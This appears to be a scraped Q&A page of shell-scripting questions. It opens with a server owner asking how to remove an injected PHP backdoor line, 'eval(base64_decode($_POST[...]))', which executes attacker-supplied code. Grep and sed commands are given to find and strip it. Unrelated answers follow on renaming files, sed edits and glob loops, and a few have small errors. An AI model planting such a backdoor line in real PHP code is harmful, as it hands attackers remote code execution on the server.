I found several php-files on the webserver(CentOs with WHM) that contain something like this:
eval(base64_decode($_POST['n23fcad']));?><?php
or
eval(base64_decode($_POST['n56660d']));?><?php
And so on.
Can I remove this part of code from the php-file, leaving the rest of the file intact?
For now I'm using the following line to detect the files:
grep -lr --include=*.php "eval(base64_decode" .
I don't know how to delete the malicious part.
As you can see between the brackets of POST the code changes.
So hopefully there is a way to delete these kind of lines.
Thanks in advance!
Please try the following method
cat injected_file.php | sed 's/<?php.*eval.*]));?>//g' > good_file.php
it works for me.
Related
I want to add the ".sbd" after all files ending on ".utf8" in a directory
I do not want to replace the extensions, but really want to add them so the filenames will look like "filename.utf8.sbd"
I think I should adapt the following code, but don't manage to find out exactly how
for f in *.utf8 ; do mv "$f" "$f.sbd" ; done
Can anyone help me? I am very new to the command line
Thanks a bunch!
Your code should work if no file has spaces (or other "special" character) in the name and if the directory is not pathologically big.
In those cases, you can use something like this:
ls|grep '*.utf8$'|while read i; do mv "$i" "$i.sbd"; done
I currently am trying to write a bash script with sed that will delete the settings in Tripwire's file twpol.txt file. If anyone knows how that'd be great or if you could let me know if someone has done something like it that'd be helpful as well because right now I'm getting over 200 lines of false negative error reports.
I've already tried something like:
sed -i -d "/usr/sbin/fixrmtab"
To delete lines containing /usr/sbin/fixrmtab:
sed -i '/usr\/sbin\/fixrmtab/d' twpol.txt
This is my problem. Using sed remove only the first instance of a semicolon on each line and replace it with a dash (-)
Could someone please help me figure this out?
Thank you.
Assuming you have this in a file called file
123;456;789;987;654;321
aaa;bbb;ccc;ddd;eee;fff
This command
sed 's/;/-/' file
will give you this
123-456;789;987;654;321
aaa-bbb;ccc;ddd;eee;fff
I'm familiar with the structure of
for file in foo/folder\ with\ spaces/foo2/*.txt
do
#do some stuff...
done
However, I want to put foo/folder with spaces/foo2/*.txt into a variable and then use it. Something like this:
myDirectory="foo/folder with spaces/foo2/*.txt"
for file in $myDirectory
do
# do some stuff
done
But what I've written here doesn't work, and it won't work even if I do
myDirectory="food/folder\ with\ spaces/foo2/*.txt"
or
for file in "$myDirectory" ...
Any help? is this even possible?
don't parse ls
# your files are expanded here
# note lack of backslashes and location of quotes
myfiles=("food/folder with spaces/foo2/"*.txt)
# iterate over the array with this
for file in "${myfiles[#]}"; do ...
Parsing ls is a bad idea, instead just do the shell globbing outside of the quotes.
You could also do:
$mydir="folder/with spaces"
for file in "$mydir"/*; do
...
done
Also look into how find and xargs works. Many of these sort of problems can be solved using those. Look at the -print0 and -0 options in particular if you want to be safe.
Try using the ls command in the for loop. This works for me:
for file in `ls "$myDirectory"`
I'm trying to use the rename command in a Terminal in Ubuntu to append a string to the beginning of some avi file names as follows.
rename -n 's/(\w)\.avi$/String_to_add__$1\.avi/' *.avi
So I expect the following:
String_to_add_MyMovie.avi
Problem is that when I run the command it appends the string to the end of the file name, so I end up with the following:
MyMovie_String_to_add_.avi
I'm not sure if I have the perlexpr syntax wrong or something else. Any insight is appreciated.
UPDATE:
Thanks for the suggestions, I tried the suggestions from alno and plundra and made the following modification:
rename -n 's/(\w+)\.avi$/String_to_add__$1\.avi/' *.avi
But now the file gets the string inserted in the middle of the name as follows:
My_String_to_add_Movie
My apologies though, I neglected to mention that the titles are preceded by 3 numeric values, so the file name nomenclature is {3 numbers}-My_Movie.avi so for example 001-My_Movie.avi. But I didn't think this would make a difference since I'm assuming \w+ matches alphanumeric characters, might the '-' be the issue?
Haven't tried Christian's approach yet, I want to be able to use the rename command, or at least understand why it's not working before I try a different approach.
I don't think rename -n is standard. You could do this:
for i in *.avi; do mv $i String_to_add_$i; done
You're only matching a single character with \w, you want \w+, so the complete line would be:
rename -n 's/(\w+)\.avi$/String_to_add__$1\.avi/' *.avi
Correct version:
rename -n 's/(\w+)\.avi$/String_to_add__$1\.avi/' *.avi
You simply forgot + after \w, so it tried to match only one character.